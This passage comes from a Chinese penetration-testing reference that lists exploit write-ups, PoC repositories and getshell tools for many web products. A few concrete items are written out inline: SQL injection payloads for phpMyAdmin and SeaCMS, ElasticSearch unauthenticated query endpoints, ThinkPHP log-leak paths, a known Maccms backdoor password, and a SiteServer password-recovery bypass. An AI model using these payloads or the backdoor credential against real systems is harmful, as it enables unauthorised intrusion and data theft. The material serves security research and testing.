[Discuz!x3.4后台文件任意删除漏洞分析](https://xz.aliyun.com/t/4725) [DiscuzX v3.4 排行页面存储型XSS漏洞 分析](https://xz.aliyun.com/t/2899) [WooYun-2015-137991 Discuz利用UC_KEY进行前台getshell2](https://php.mengsec.com/bugs/wooyun-2015-0137991.html) [Discuz! 1.5-2.5 命令执行漏洞分析(CVE-2018-14729)](https://paper.seebug.org/763/) [FoolMitAh/CVE-2018-14729](https://github.com/FoolMitAh/CVE-2018-14729) [实例分析 DiscuzX 3.4 SSRF漏洞](https://mp.weixin.qq.com/s/TRCdXZU8v1NsbFhZKLa1Qw) [Discuz x3.4前台SSRF](https://www.codercto.com/a/43029.html) [theLSA/discuz-ml-rce](https://github.com/theLSA/discuz-ml-rce) [Discuz! ML远程代码执行(CVE-2019-13956)](https://www.cnblogs.com/yuzly/p/11386755.html) [Discuz!ML V3.X 代码注入分析](https://xz.aliyun.com/t/5638) ## Drupal [CVE-2017-6920:Drupal远程代码执行漏洞分析及POC构造](https://paper.seebug.org/334/) [Drupal Core 8 PECL YAML 反序列化任意代码执行漏洞 (CVE-2017-6920)](https://vulhub.org/#/environments/drupal/CVE-2017-6920/) https://github.com/vulhub/vulhub/blob/master/drupal/CVE-2018-7600/README.zh-cn.md [pimps/CVE-2018-7600](https://github.com/pimps/CVE-2018-7600) [dreadlocked/Drupalgeddon2](https://github.com/dreadlocked/Drupalgeddon2) [Drupal 远程代码执行漏洞(CVE-2018-7602)](https://vulhub.org/#/environments/drupal/CVE-2018-7602/) [CVE-2018-7600/drupa7-CVE-2018-7602.py](https://github.com/pimps/CVE-2018-7600/blob/master/drupa7-CVE-2018-7602.py) [Drupal 1-click to RCE 分析](https://paper.seebug.org/897/) https://vulhub.org/#/environments/drupal/CVE-2019-6339/ [Drupal(CVE-2020-28948/CVE-2020-28949)分析](https://mp.weixin.qq.com/s/-5z2gCrstyCLOOzgf1tZTg) ## ECshop [ECShop 2.x/3.x SQL注入/任意代码执行漏洞](https://github.com/vulhub/vulhub/blob/master/ecshop/xianzhi-2017-02-82239600/README.zh-cn.md) [ecshop2.x 代码执行](https://paper.seebug.org/691/) [ecshop后台getshell](http://www.zstreamer.cn/2020/09/09/ecshop2.7_3.6后台getshell/) ## ElasticSearch - `http://[ip]:9200` - `http://[ip]:9200/_plugin/head/` web 管理界面 - `http://[ip]:9200/hello/_search?pretty&size=50&from=50` - `http://[ip]:9200/_cat/indices` - `http://[ip]:9200/_river/_search` 查看数据库敏感信息 - `http://[ip]:9200/_nodes` 查看节点数据 - `http://[ip]:9200/_cat/indices?v` 查看当前节点的所有 Index - `http://[ip]:9200/_search?pretty=true` 查询所有的 index, type - [Elasticvue](https://chrome.google.com/webstore/detail/elasticvue/hkedbapjpblbodpgbajblpnlpenaebaa?hl=en-US) - 进行未授权访问漏洞利用的插件 [ElasticSearch 命令执行漏洞 (CVE-2014-3120) 测试环境](https://vulhub.org/#/environments/elasticsearch/CVE-2014-3120/) [Remote Code Execution in Elasticsearch - CVE-2015-1427](https://jordan-wright.com/blog/2015/03/08/elasticsearch-rce-vulnerability-cve-2015-1427/) [ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞 (CVE-2015-1427) 测试环境](https://vulhub.org/#/environments/elasticsearch/CVE-2015-1427/) https://vulhub.org/#/environments/elasticsearch/CVE-2015-3337/ [Elasticsearch目录遍历漏洞 (CVE-2015-5531) 复现与分析 (附PoC)](https://www.freebuf.com/vuls/99942.html) https://blog.csdn.net/u013613428/article/details/121884479 ## Exchange [xchange邮件服务器的账户爆破](https://github.com/grayddq/EBurst) [利用NTLM Hash读取Exchange邮件](https://github.com/Ridter/GetMail) [Exchange渗透测试总结](https://www.anquanke.com/post/id/184342) ## ewebeditor [ewebeditor 编辑器漏洞总结](https://www.0dayhack.com/post-426.html) ## Fastadmin [fastadmin最新版前台getshell漏洞](https://mp.weixin.qq.com/s/XR6p6sf3__QtpMjJuJEjfA) [fastadmin文件管理插件](https://github.com/WenchaoLin/Filex) ## FastJson [基于dbcp的fastjson rce 回显](https://github.com/depycode/fastjson-local-echo) [Fastjson-Gadgets-自动扫描仪](https://github.com/H3rmesk1t/Fastjson-Gadgets-Automatic-Scanner) [Fastjson姿势技巧集合](https://github.com/safe6Sec/Fastjson) [fastjson bypass autotype 1.2.68 with Throwable and AutoCloseable.](https://github.com/Y4er/fastjson-bypass-autotype-1.2.68) ## Fckeditor [fck2.4.3文件上传通杀脚本](https://github.com/chaosec2021/FCKeditor-2.4.3--exp) [Fckeditor上传漏洞利用拿shell总结](https://www.0dayhack.com/post-413.html) ## Flask [Flask 内存马](https://github.com/iceyhexman/flask_memory_shell) ## GeoServer [CVE-2023-25157 - GeoServer SQL 注入 - PoC](https://github.com/win3zz/CVE-2023-25157/) ## Gitlab [gitlab-version-nse](https://github.com/righel/gitlab-version-nse) [通过the bulk imports UploadsPipeline任意文件读取](https://gitlab.com/gitlab-org/gitlab/-/issues/349524) [CVE-2021-22205](https://github.com/inspiringz/CVE-2021-22205) [CVE-2021-22205](https://github.com/Al1ex/CVE-2021-22205) [GitLab任意文件读取漏洞复现](https://mp.weixin.qq.com/s/HKZHUs_bTN-00_8HsU6grA) [Arbitrary file read via the UploadsRewriter when moving and issue](https://hackerone.com/reports/827052) [CsEnox/CVE-2022-2992](https://github.com/CsEnox/CVE-2022-2992) ## Gitea [Gitea 存储库迁移远程命令执行漏洞。](https://github.com/wuhan005/CVE-2022-30781) [Go代码审计 - gitea 远程命令执行漏洞链](https://www.leavesongs.com/PENETRATION/gitea-remote-command-execution.html) https://github.com/vulhub/vulhub/tree/master/gitea/1.4-rce ## Harbor https://github.com/goharbor/harbor/security/advisories/GHSA-6qj9-33j4-rvhg https://unit42.paloaltonetworks.com/critical-vulnerability-in-harbor-enables-privilege-escalation-from-zero-to-admin-cve-2019-16097/ https://www.youtube.com/watch?v=v8Isqy4yR3Q ## Hikvision [Hikvision 流媒体管理服务器敏感信息泄漏](https://github.com/Henry4E36/HikvisionInformation) [海康威视 CVE-2021-36260 RCE 漏洞](https://github.com/Cuerz/CVE-2021-36260) [海康威视综合安防平台后渗透利用工具](https://github.com/wafinfo/Hikvision) [HIKVISION iVMS-8700综合安防管理平台 upload.action 任意文件上传](https://peiqi.wgpsec.org/wiki/iot/HIKVISION/HIKVISION%20iVMS-8700%E7%BB%BC%E5%90%88%E5%AE%89%E9%98%B2%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20upload.action%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0.html) [HIKVISION 综合安防管理平台 applyCT Fastjson远程命令执行漏洞](https://peiqi.wgpsec.org/wiki/iot/HIKVISION/HIKVISION%20%E7%BB%BC%E5%90%88%E5%AE%89%E9%98%B2%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20applyCT%20Fastjson%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html) [HiKVISION 综合安防管理平台 files 任意文件上传漏洞](https://peiqi.wgpsec.org/wiki/iot/HIKVISION/HiKVISION%20%E7%BB%BC%E5%90%88%E5%AE%89%E9%98%B2%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20files%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html) [HiKVISION 综合安防管理平台 report 任意文件上传漏洞](https://peiqi.wgpsec.org/wiki/iot/HIKVISION/HiKVISION%20%E7%BB%BC%E5%90%88%E5%AE%89%E9%98%B2%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20report%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html) [HiKVISION 综合安防管理平台 env 信息泄漏漏洞](https://peiqi.wgpsec.org/wiki/iot/HIKVISION/HiKVISION%20%E7%BB%BC%E5%90%88%E5%AE%89%E9%98%B2%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20env%20%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.html) ## IIS [多线程批量检测IIS短文件名漏洞+漏洞利用](https://github.com/VMsec/iisScaner) [CVE-2017-7269 IIS6.0远程代码执行漏洞分析及Exploit](https://paper.seebug.org/259/) [lcatro/CVE-2017-7269-Echo-PoC](https://github.com/lcatro/CVE-2017-7269-Echo-PoC) [edwardz246003/IIS_exploit](https://github.com/edwardz246003/IIS_exploit) ## IP-Guard [【漏洞复现】IP-guard WebServer 远程命令执行漏洞](https://mp.weixin.qq.com/s?__biz=MzI3NzMzNzE5Ng==&mid=2247486971&idx=1&sn=11a6cbd4db9a45976beb39fe613a3010) ## Jboss [JBOSS和其他 Java 反序列化漏洞验证和利用工具](https://github.com/joaomatosf/jexboss) [jboss常见漏洞复现](https://www.xpshuai.cn/posts/60637/) [Jboss漏洞总结](http://www.zstreamer.cn/2020/07/09/Jboss漏洞总结/) [Red Hat JBoss EAP - Deserialization of Untrusted Data](https://www.exploit-db.com/exploits/40842) [JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)](https://github.com/vulhub/vulhub/blob/master/jboss/CVE-2017-7504/README.md) [yunxu1/jboss-_CVE-2017-12149](https://github.com/yunxu1/jboss-_CVE-2017-12149) [jreppiks/CVE-2017-12149](https://github.com/jreppiks/CVE-2017-12149) https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-12149 [JBoss JMXInvokerServlet 反序列化漏洞](https://github.com/vulhub/vulhub/blob/master/jboss/JMXInvokerServlet-deserialization/README.md) ## JeecgBoot [jmreport/qurestSql 未授权SQL注入批量扫描poc](https://github.com/MzzdToT/CVE-2023-1454) ## Jetty https://github.com/vulhub/vulhub/blob/master/jetty/CVE-2021-28169/README.zh-cn.md https://github.com/vulhub/vulhub/blob/master/jetty/CVE-2021-28164/README.zh-cn.md ## Jenkins [awesome-jenkins-rce](https://github.com/orangetw/awesome-jenkins-rce-2019) [Hacking Jenkins Part 1 - Play with Dynamic Routing](https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/) [Hacking Jenkins Part 2 - Abusing Meta Programming for Unauthenticated RCE!](https://devco.re/blog/2019/02/19/hacking-Jenkins-part2-abusing-meta-programming-for-unauthenticated-RCE/) [Jenkins RCE漏洞分析汇总](http://www.lmxspace.com/2019/09/15/Jenkins-RCE漏洞分析汇总/) [安全研究 | Jenkins漏洞分析](https://www.freebuf.com/news/242764.html) [Jenkins漏洞探测、用户抓取爆破](https://github.com/blackye/Jenkins) [Jenkins任意文件读取漏洞(CVE-2018-1999002)复现记录](https://mp.weixin.qq.com/s/MOKeN1qEBonS8bOLw6LH_w) [Jenkins未授权访问RCE漏洞复现记录 | angelwhu_blog](https://www.angelwhu.com/blog/?p=539) [jas502n/CVE-2019-10392](https://github.com/jas502n/CVE-2019-10392) ## Joomla [CVE-2017-8917 - SQL injection Vulnerability Exploit in Joomla 3.7.0](https://github.com/stefanlucas/Exploit-Joomla) [Joomla! 3.7 Core SQL 注入 (CVE-2017-8917)漏洞分析](https://paper.seebug.org/305/) [HoangKien1020/CVE-2021-23132](https://github.com/HoangKien1020/CVE-2021-23132) ## JumpServer [JumpServer远程执行漏洞 复现](https://www.o2oxy.cn/2921.html) [JumpServer远程命令执行你可能不知道的点(附利用工具)](https://mp.weixin.qq.com/s/lbcYzNsiOYZRwQzAIYxg3g) [Skactor/jumpserver_rce](https://github.com/Skactor/jumpserver_rce) [Veraxy00/Jumpserver-EXP](https://github.com/Veraxy00/Jumpserver-EXP) [Jumpserver安全一窥:Sep系列漏洞深度解析](https://mp.weixin.qq.com/s/3iAn_aUNg8k5qW34Yb21Bw) [JumpServer 密码重置漏洞](https://github.com/C1ph3rX13/CVE-2023-42820) [JumpServer 任意文件写入漏洞 CVE-2023-42819 + CVE-2023-42820 = GetShell](https://github.com/C1ph3rX13/CVE-2023-42819) ## Kindeditor [kindeditor<=4.1.5上传漏洞复现](https://www.cnblogs.com/backlion/p/10421405.html) [大批量Kindeditor文件上传事件的漏洞分析](https://www.freebuf.com/column/202148.html) ## Laravel [Laravel 6.x/7.x的一条执行代码的反序列化利用链](https://www.o2oxy.cn/3588.html) [LARAVEL <= V8.4.2 DEBUG MODE: REMOTE CODE EXECUTION](https://www.ambionics.io/blog/laravel-debug-rce) [漏洞分析 | Laravel Debug页面RCE(CVE-2021-3129)分析复现](https://mp.weixin.qq.com/s/k08P2Uij_4ds35FxE2eh0g) [再谈Laravel Debug mode RCE(CVE-2021-3129)漏洞](https://www.freebuf.com/vuls/264662.html) [ambionics/laravel-exploits](https://github.com/ambionics/laravel-exploits) [Laravel 8.x image upload bypass](https://infosecwriteups.com/laravel-8-x-image-upload-bypass-zero-day-852bd806019b) ## Log4j [log4j solr rce](https://twitter.com/pyn3rd/status/1470359076617932800) [受log4j影响的软件](https://github.com/NCSC-NL/log4shell/tree/main/software) [‍️ 🤬CVE-2021-44228 - LOG4J Java 漏洞利用 - WAF 绕过技巧](https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words) [Log4j漏洞至今仍被持续利用](https://www.horizon3.ai/the-long-tail-of-log4shell-exploitation/) [Log4j-Payloads](https://github.com/queencitycyber/Log4j-Payloads) ## Maccms ``` maccms10\extend\upyun\src\Upyun\Api\Format.php maccms10\extend\Qcloud\Sms\Sms.php 密码 WorldFilledWithLove ``` [Maccms v10后门](http://www.360doc.com/content/20/0203/14/30583588_889434397.shtml) ## Milesight [Milesight VPN server.js 任意文件读取漏洞](https://peiqi.wgpsec.org/wiki/iot/Milesight/Milesight%20VPN%20server.js%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html) ## MinIO [容器与云的碰撞——一次对MinIO的测试](https://cloud.tencent.com/developer/article/1785462) [(CVE-2023-28432) | MinIO verify 接口敏感信息泄露漏洞](https://mp.weixin.qq.com/s?__biz=MzkyMjE3MjEyNQ==&mid=2247486024&idx=1&sn=505829c79bc3bdc2b6598cdaf104666b&chksm=c1f925faf68eacec10fbc833c87f8f95578ebe0cd86b9d54690d471fd1d10eb44bf145d6be6a) https://github.com/minio/console/security/advisories/GHSA-4999-659w-mq36 ## MessageSolution [CNVD-2021-10543:MessageSolution 企业邮件归档管理系统 EEA 存在信息泄露漏洞](https://github.com/Henry4E36/CNVD-2021-10543) ## MetInfo [MetInfo5.3.19安装过程过滤不严导致Getshell](https://bbs.ichunqiu.com/thread-35305-1-17.html) [MetInfo6.0.0漏洞集合(一)](https://bbs.ichunqiu.com/thread-43416-1-7.html) [MetInfo6.1.0 漏洞(二)](https://bbs.ichunqiu.com/thread-43625-1-4.html) [Metinfo 6.1.2 SQL注入](https://bbs.ichunqiu.com/thread-46687-1-1.html) [metinfo最新版本后台getshell](https://bbs.ichunqiu.com/thread-29686-1-2.html) [Metinfo7的一些鸡肋漏洞](https://evi1.cn/post/metinfo7-bug/) [Metinfo7.0 SQL Blind Injection](https://github.com/T3qui1a/metinfo_sqlinjection/issues/1) [CVE-2018-13024复现及一次简单的内网渗透](https://www.freebuf.com/news/193748.html) ## Metabase [Metabase validate 远程命令执行漏洞 CVE-2023-38646](https://peiqi.wgpsec.org/wiki/webapp/Metabase/Metabase%20validate%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%20CVE-2023-38646.html) ## MeterSphere [任意文件上传](https://github.com/metersphere/metersphere/issues/8653) ## Nacos 大部分企业的 nacos 的 url 为 /v1/auth/users ,而不是 /nacos/v1/auth/users [Alibaba Nacos 未授权访问漏洞](https://blog.csdn.net/m0_46257936/article/details/113127814) https://raw.githubusercontent.com/dwisiswant0/nuclei-templates/add/GHSL-2020-325/cves/2021/CVE-2021-29441.yaml [Nacos Client Yaml反序列化漏洞分析](https://xz.aliyun.com/t/10355) [Nacos密码碰撞](https://www.jisuan.mobi/nX7.html) [Nacos Hessian 反序列化漏洞利用工具](https://github.com/c0olw/NacosRce) ## NETGEAR ProSafe SSL VPN [NETGEAR ProSafe SSL VPN SQL 注入漏洞](https://github.com/badboycxcc/Netgear-ssl-vpn-20211222-CVE-2022-29383) ## Nexus [Nexus Repository Manager 3 远程命令执行漏洞 (CVE-2019-7238)](https://vulhub.org/#/environments/nexus/CVE-2019-7238/) [mpgn/CVE-2019-7238](https://github.com/mpgn/CVE-2019-7238) [jas502n/CVE-2019-7238](https://github.com/jas502n/CVE-2019-7238) [Nexus Repository Manager(CVE-2020-10199/10204)漏洞分析及回显利用方法的简单讨论](https://www.cnblogs.com/magic-zero/p/12641068.html) [aleenzz/CVE-2020-10199](https://github.com/aleenzz/CVE-2020-10199) [CVE-2020-29436:Nexus3 XML外部实体注入复现](https://mp.weixin.qq.com/s/u6LWHvNEieQsV-ny6xwMmQ) ## NPS [carr0t2/nps-auth-bypass](https://github.com/carr0t2/nps-auth-bypass) ## Openfire [后台插件getshell](https://github.com/22CB7139/openfire_shells) [openfire AES和Blowfish加解密工具](https://github.com/ca3tie1/OpenFireEncryptor) ## Oracle Access Manager [CVE-2021-35587 Oracle Access Manager 未经身份验证的攻击者漏洞 ](https://github.com/antx-code/CVE-2021-35587/blob/main/CVE-2021-35587.py) ## Outlook [ 一个玩 Outlook 的小工具](https://github.com/eksperience/KnockOutlook) ## Panalog 日志审计系统 [panalog日志审计系统任意用户创建漏洞和后台命令执行](https://mp.weixin.qq.com/s/98kn5ry-C-IeKY2MDebjLw) ## PHPMailer [PHPMailer 任意文件读取漏洞](https://mp.weixin.qq.com/s/y7N3CD1683W2WX-naT5HCA) ## phpMyAdmin [phpMyAdmin新姿势getshell](https://zhuanlan.zhihu.com/p/25957366) [phpMyAdmin 4.6.2 - (Authenticated) Remote Code Execution](https://www.exploit-db.com/exploits/40185) [phpMyAdmin 4.7.x CSRF 漏洞利用](https://blog.vulnspy.com/2018/06/10/phpMyAdmin-4-7-x-XSRF-CSRF-vulnerability-exploit/) [phpmyadmin4.8.1后台getshell](https://mp.weixin.qq.com/s/HZcS2HdUtqz10jUEN57aog) [CVE-2018-12613漏洞学习总结](https://mp.weixin.qq.com/s/zGJxjtDLkw9CMHGfNRu1nw) [phpMyAdmin任意文件读取漏洞复现(CVE-2019-6799)以及检测POC编写](https://bbs.zkaq.cn/t/4570.html) [CVE-2019-12922 4.9.0.1 CSRF](https://www.hedysx.com/bug/2398.html) CVE-2020-26935 phpmyadmin后台SQL注入 ```mysql /tbl_zoom_select.php?db=pentest&table=a&get_data_row=1&where_clause=updatexml(1,concat(0x7e,user()),1) ``` [phpMyAdmin 5.1.1 - XSS](https://mp.weixin.qq.com/s/c2kwxwVUn1ym7oqv9Uio_A) ## PHPMyWind [记一次渗透测试历程](https://xz.aliyun.com/t/6018) [phpmywind最新版sql注入以及后台目录遍历和文件读取](https://blog.csdn.net/dengzhasong7076/article/details/102139691) [PHPMyWind v5.5 审计记录](https://bbs.ichunqiu.com/thread-46703-1-1.html) https://www.exploit-db.com/exploits/42535 ## PigCMS [PigCMS action_flashUpload 任意文件上传漏洞](https://peiqi.wgpsec.org/wiki/cms/PigCMS/PigCMS%20action_flashUpload%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html) ## Resin [针对Resin服务的攻击向量整理](https://blkstone.github.io/2017/10/30/resin-attack-vectors/) [Resin任意文件读取漏洞](https://www.cnblogs.com/KevinGeorge/p/8953731.html) [Resin容器文件解析漏洞深入分析](https://mp.weixin.qq.com/s/eZAG3Ze0ytd5l7ci1nb-qg) ## SeaCMS app="海洋CMS" 攻击者可通过对admin_members_group.php的编辑操作中的id参数利用该漏洞进行SQL注入攻击。 ``` /admin_members_group.php?action=edit&id=2%20and%20if(mid(user(),1,1)=%27r%27,concat(rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27))%20RLIKE%20%27(a.*)%2b(a.*)%2b(a.*)%2b(a.*)%2b(a.*)%2b(a.*)%2b(a.*)%2bcd%27,1) ``` ## Shiro [基于SerializationDumper的Shiro Cookie序列化数据解密小工具](https://github.com/r00tuser111/SerializationDumper-Shiro) [改造BeichenDream/InjectJDBC加入shiro获取key和修改key功能](https://github.com/SummerSec/AgentInjectTool) [shiro-550-with-NoCC](https://github.com/dr0op/shiro-550-with-NoCC) [j1anFen/shiro_attack](https://github.com/j1anFen/shiro_attack) [ShiroExploit-Deprecated](https://github.com/feihong-cs/ShiroExploit-Deprecated) [Echox1/ShiroExploit](https://github.com/Echox1/ShiroExploit) [Ares-X/shiro-exploit](https://github.com/Ares-X/shiro-exploit) [shiro 反序列 命令执行辅助检测工具](https://github.com/wyzxxz/shiro_rce_tool) [burp插件 ShiroScan 主要用于框架、无dnslog key检测](https://github.com/Daybr4ak/ShiroScan) ## ShopXO [ShopXO download 任意文件读取漏洞 CNVD-2021-15822](https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog) ## ShowDoc [ShowDoc 前台任意文件上传](http://47.115.146.38/2021/04/27/showdoc/) ## SiteServer **找回密码** 管理员的 “密码找回问题答案” 为非强制项,一般都留空。此时如果在密码找回页面,输入空密码找回答案,就可以获得当前管理员的密码明文(页面有做 javascript 限制答案长度不能为 0,但禁用 javascript 即可绕过) 访问 /siteserver/forgetPassword.aspx, 然后禁止 Javascript。输入用户名,获取密码 [代码审计 | SiteServerCMS身份认证机制](https://www.freebuf.com/vuls/228448.html) [代码审计 | SiteServerCMS密钥攻击](https://www.freebuf.com/vuls/234549.html) [某Server CMS最新6.8.3版本验证码绕过&后台多处注入](https://xz.aliyun.com/t/4119) [简记野生应急捕获到的siteserver远程模板下载Getshell漏洞](https://www.freebuf.com/articles/web/195105.html) [zhaoweiho/SiteServer-CMS-Remote-download-Getshell](https://github.com/zhaoweiho/SiteServer-CMS-Remote-download-Getshell) ## Sophos Firewall [CVE-2022-1040](https://github.com/killvxk/CVE-2022-1040) ## Spring [CVE-2022-22947 Spring Cloud Gateway 远程代码执行漏洞复现](https://mp.weixin.qq.com/s/5ZBpVTofGpG_ssz2iPeI2A) [Spring-cloud-function SpEL RCE, Vultarget & Poc](https://github.com/cckuailong/spring-cloud-function-SpEL-RCE) [SpringBootVulExploit](https://github.com/LandGrey/SpringBootVulExploit) [一款针对SpringBootEnv页面进行快速漏洞利用](https://github.com/0x727/SpringBootExploit) [Spring漏洞利用](https://github.com/Crush-sudo/pocsuite/tree/master/Spring) [Spring boot Fat Jar 任意写文件漏洞到稳定 RCE 利用技巧](https://github.com/LandGrey/spring-boot-upload-file-lead-to-rce-tricks) [Spring扫描器](https://github.com/0xsp-SRD/OffensivePascal/tree/main/SpringCore-Scanner) [HeapDump敏感信息提取工具](https://github.com/whwlsfb/JDumpSpider) [基于springboot和spring security的Java web常见漏洞及安全代码](https://github.com/JoyChou93/java-sec-code) [SpringBoot 相关漏洞学习资料,利用方法和技巧合集,黑盒安全评估 check list](https://github.com/LandGrey/SpringBootVulExploit) ## Struts2 [Struts2全漏洞扫描利用工具](https://github.com/HatBoy/Struts2-Scan) [Struts漏洞源码](https://github.com/xhycccc/Struts2-Vuln-Demo) [S2-062 (CVE-2021-31805) / S2-061 / S2-059 RCE](https://github.com/Wrin9/CVE-2021-31805) [远程代码执行S2-062 CVE-2021-31805验证POC](https://github.com/YanMu2020/s2-062) [Python2编写的struts2漏洞全版本检测和利用工具](https://github.com/Lucifer1993/struts-scan) [Struts2 系列漏洞检查工具](https://github.com/shack2/Struts2VulsTools) [Golang 版 Struts2 漏洞扫描利用工具](https://github.com/x51/STS2G) [struts2绕过waf读写文件及另类方式执行命令](https://f0ng.github.io/2022/04/14/struts2绕过waf读写文件及另类方式执行命令/) [Struts2漏洞扫描 Burp插件](https://github.com/novysodope/ST2Scanner) [一款检测Struts2 RCE漏洞的burp被动扫描插件,仅检测url后缀为.do以及.action的数据包](https://github.com/x1a0t/Struts2Burp) ## ThinkAdmin [ThinkAdminV6 未授权访问and 任意文件查看 漏洞复现](https://blog.csdn.net/Adminxe/article/details/108744912) ## ThinkCMF [ThinkCMF 任意内容包含getshell漏洞](https://www.hacking8.com/bug-web/ThinkCMF/ThinkCMF-框架上的任意内容包含漏洞.html) [jas502n/ThinkCMF_getshell](https://github.com/jas502n/ThinkCMF_getshell) ## Thinkphp [实战技巧|利用ThinkPHP5.X的BUG实现数据库信息泄露](https://mp.weixin.qq.com/s/B9jkF0e0SMTJ6r09Syy-8A) [thinkphp5 mysql账号密码泄露漏洞](https://mp.weixin.qq.com/s/R11Ha6ksbd7kslAuhyy73Q) [ThinkPHP使用不当可能造成敏感信息泄露](https://blog.csdn.net/Fly_hps/article/details/81201904) [https://mp.weixin.qq.com/s/1ZkiKqHogWOy0U4rQNnGtQ](https://mp.weixin.qq.com/s/1ZkiKqHogWOy0U4rQNnGtQ) 日志泄露 ``` /Application/Runtime/Logs/Home/16_09_06.log # 其中 Application 可能会变,比如 App /Runtime/Logs/Home/16_09_06.log # 年份_月份_日期 /Runtime/Logs/User/16_09_06.log # 年份_月份_日期 ``` [ThinkphpGUI](https://github.com/Lotus6/ThinkphpGUI) [thinkphp6 session 任意文件创建漏洞复现 含POC](https://mp.weixin.qq.com/s/8k96KSpWMk7S4-_TzweXxg) [一键 ThinkPHP 漏洞检测](https://github.com/Lucifer1993/TPscan) [ thinkphp5 rce 漏洞检测工具](https://github.com/theLSA/tp5-getshell) [-Thinkphp rce 扫描脚本,附带日志扫描](https://github.com/sukabuliet/ThinkphpRCE) [tangxiaofeng7/TPScan](https://github.com/tangxiaofeng7/TPScan) [ThinkPHP 漏洞 综合利用工具, 图形化界面, 命令执行, 一键getshell, 批量检测, 日志遍历, session包含, 宝塔绕过](https://github.com/bewhale/thinkphp_gui_tools) - ## Tomcat [拿来即用的Tomcat7/8/9/10版本Listener/Filter/Servlet内存马,支持注入CMD内存马和冰蝎内存马](https://github.com/ce-automne/TomcatMemShell) [Apache Tomcat JMXProxy RCE](https://github.com/4ra1n/tomcat-jmxproxy-rce-exp) [CVE-2022-26377:使用proxy_ajp对 Tomcat AJP 进行反向代理,可构造 AJP 数据包攻击后端服务](http://noahblog.360.cn/apache-httpd-ajp-request-smuggling/) [CVE-2022-29885:Apache Tomcat 集群服务Listener中的拒绝服务漏洞](https://voidzone.me/cve-2022-29885-apache-tomcat-cluster-service-dos/) [用于扫描 Apache Tomcat 服务器漏洞的 python 脚本。](https://github.com/p0dalirius/ApacheTomcatScanner) ## TP-Link [CVE-2022-25064 TP-LINK TL-WR840N RCE](https://github.com/Mr-xn/CVE-2022-25064) ## Ueditor [百度Ueditor编辑器漏洞总结](https://mp.weixin.qq.com/s/mH4GWTVoCel4KHva-I4Elw) [UEditor 1.4.3.3验证SSRF漏洞提高DNS rebinding成功率](https://jianfensec.com/渗透测试/UEditor 1.4.3.3验证SSRF漏洞提高DNS rebinding成功率/) [九维团队-绿队(改进)| Java代码审计之SSRF](https://mp.weixin.qq.com/s/bF7wJpbN4BmvT8viWGW7hw) [当ueditor遇到某盾](https://mp.weixin.qq.com/s/Lf3lMzlpBq7Vq5nDf_pUcw) [Ueditor编辑器漏洞(文件上传)](https://www.jianshu.com/p/681162ed0374) [theLSA/ueditor-getshell](https://github.com/theLSA/ueditor-getshell) ## Vmware [CVE-2021-21974 VMWare ESXi RCE Exploit](https://github.com/Shadow0ps/CVE-2021-21974) [CVE-2021-21972-vCenter-6.5-7.0-RCE-POC](https://github.com/QmF0c3UK/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC) [利用 VMWare Horizon 中的 CVE-2021-44228 进行远程代码执行等](https://github.com/puzzlepeaches/Log4jHorizon) [SharpSphere](https://github.com/JamesCooteUK/SharpSphere) [VMWare vRealize SSRF-CVE-2021-21975](https://github.com/Henry4E36/VMWare-vRealize-SSRF) [Vmware vhost password decrypt](https://github.com/shmilylty/vhost_password_decrypt) [CVE-2022-22972 的 POC 影响 VMware Workspace ONE、vIDM 和 vRealize Automation 7.6。](https://github.com/horizon3ai/CVE-2022-22972) [.NET 攻击 vCenter 项目](https://github.com/JamesCooteUK/SharpSphere) [从 vCenter 备份中提取 IdP 证书并以管理员身份登录的工具](https://github.com/horizon3ai/vcenter_saml_login) [Vcenter Server CVE-2021-21985 RCE PAYLOAD](https://iswin.org/2021/06/02/Vcenter-Server-CVE-2021-21985-RCE-PAYLOAD/) [CVE-2021-21985 (Vulnerable Code)](https://github.com/alt3kx/CVE-2021-21985_PoC) [VMware vCenter漏洞实战利用总结](https://www.ctfiot.com/39518.html) [Vcenter实战利用方式总结](https://forum.butian.net/share/1893) ## VMware VRealize Network Insight [VMWare vRealize Network Insight Pre-Authenticated RCE (CVE-2023-20887)](https://github.com/sinsinology/CVE-2023-20887) ## Weblogic [weblogic t3 deserialization rce](https://github.com/5up3rc/weblogic_cmd) [适用于weblogic和Tomcat的无文件的内存马](https://github.com/keven1z/weblogic_memshell) [Weblogic漏洞检测](https://github.com/0nise/weblogic-framework) [CVE-2018-3245-PoC](https://github.com/pyn3rd/CVE-2018-3245) 